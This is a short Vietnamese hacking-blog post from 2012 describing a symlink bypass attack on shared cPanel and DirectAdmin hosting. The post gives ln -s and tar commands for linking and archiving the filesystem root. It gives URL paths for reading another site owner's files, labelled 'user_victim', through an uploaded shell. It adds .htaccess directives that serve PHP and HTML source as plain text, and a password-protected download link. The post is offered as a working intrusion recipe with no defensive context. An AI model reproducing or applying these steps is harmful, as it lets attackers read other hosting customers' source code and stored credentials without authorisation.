Trang chủ » Local Attack » symljnk bypass view file.php

9 thg 7, 2012

symljnk bypass view file.php

Cpanel (:2082) 
ln -s / dmx.txt 
tar -zcvf cpanel_dmx.tar.gz  
direct admin(:2222)
ln -s / r00t
tar -zcvf direct_r00t.tar.gz r00t 
 có quyền login host và giải nén thư mục ra
chạy trên address
cpanel :http://shell_on_this_host_/dmx.txt/home/user_victim/public_html/index.php
direct :r00t/home/user_victim/domains/public_html/index.php

.htaccess 
Options Indexes FollowSymLinksDirectoryIndex ssssss.htmAddType txt .phpAddHandler txt .php  
con .htaccess này có chức năng show ra các file.php dưới dạng file text
nên cho dù permisson thư mục nhưng đên file này vẫn có thể viewhoặc show ra cả file.html
Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None 
Satisfy Any  


Download :http://www.mediafire.com/?bt7x83mj8qzpx92
pass: tmt
Nhãn:

Không có nhận xét nào:

Đăng nhận xét